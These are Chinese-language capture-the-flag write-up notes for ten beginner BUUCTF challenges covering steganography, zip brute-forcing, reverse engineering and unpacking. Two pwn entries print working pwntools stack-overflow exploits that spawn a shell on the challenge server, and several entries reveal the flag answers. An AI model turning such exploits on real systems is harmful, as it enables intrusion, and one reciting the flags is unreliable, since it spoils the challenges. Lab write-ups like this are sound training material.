1.你竟然赶我走
给了个jpg
直接放到010editor
拉到最下面就有
flag{stego_is_s0_bor1ing}
2.大白
一张png
提示都给了
那么这么说的话直接修改一下图片长宽高就行
crc校验的知识可以课后补一下,简单说就是,图片会隐含一个crc的一串字符,和图片大小有关,大小改变,crc随之改变,通过特殊手段可以只显示一部分图片,此时,crc不变,但是图片大小改变 会报错。通过脚本即可还原全部图片
还原后得到flag
3.有N种方法解决
解压附件
是一个exe,但是不能运行
kali file 命令识别一下,是一个txt
打开发现是一个base64 但是和图片ka'l有关系,考base64转图片
找个在线网站
转换
再用网站扫描一下二维码就行
KEY{dca57f966e4e4e31fd5b15417da63269}
4.乌镇峰会种图
其实题目不难
是个jpg图片
我以为要用stegsolve
然后找不到什么线索
然后看了一下照片属性,发现没有注释什么的
才20kb
直接在010editor打开
然后flag就在最后面
5.基础破解
非常基础
就是用软件暴力破解压缩包密码
提示已经给了
四位数字
然后就爆破出来了
解压
得到txt 然后base64解密即可
flag{70354300a5100ba78068805661b93a5c}
6.pwn1_sctf_2016
C++是真的看不懂 难受~~
查了wp
关键点是看似没有栈溢出,但是实则有个repalce的函数可以替换
将I替换成you实现栈溢出 然后再将原来的s重新赋值
总之就是很细节
然后利用栈溢出
加上原本程序里面有个system的函数
然后就编写payload了
from pwn import *
io = remote('node4.buuoj.cn', 29190)
payload = b'I'*20 + b'k'*0x4 + p32(0x8048F0D)#发送垃圾字符和函数地址
io.sendline(payload)
io.interactive()
7.jarvisoj_level0
一样的 栈溢出
溢出之后再加上对应的system函数的地址就行
拿到shell权限之后, 再寻找flag的相关文件就可以
上payload
from pwn import *
io=remote('node4.buuoj.cn', 25298)
payload = b'a'*(0x80+0x8) +p64(0x400596)
io.sendline(payload)
io.interactive()
8.reverse 2
还是看wp写的
代码分析有点问题
wp说的是 25行 比较输入值和flag变量,结果为1就输出 right flag 说明flag变量就是存着flag
的值,然后查看flag
发现就是hacking_for_fun}
但是上面还有一个字符的替换 在第19行到第23行
(这里我根本看不懂 明明这个函数就在上面,为什么会影响到下面的s输入)
这里替换的机制就是将i和r换成1
所以flag是
flag{hack1ng_fo1_fun}
9.内涵的软件
ida32打开
这里有一个DBAPP{49d3c93df25caad81232130f3d2ebfad}
还有非常像flag
DBAPP替换flag
试一下
flag{49d3c93df25caad81232130f3d2ebfad}
没想到就直接ok了
有点意外
10、新年快乐
简单的脱壳
先查壳
upx壳
使用的工具是
upx静态脱壳工具
脱壳即可
然后分析ida32里的内容
分析一下就可以
flag{HappyNewYear!}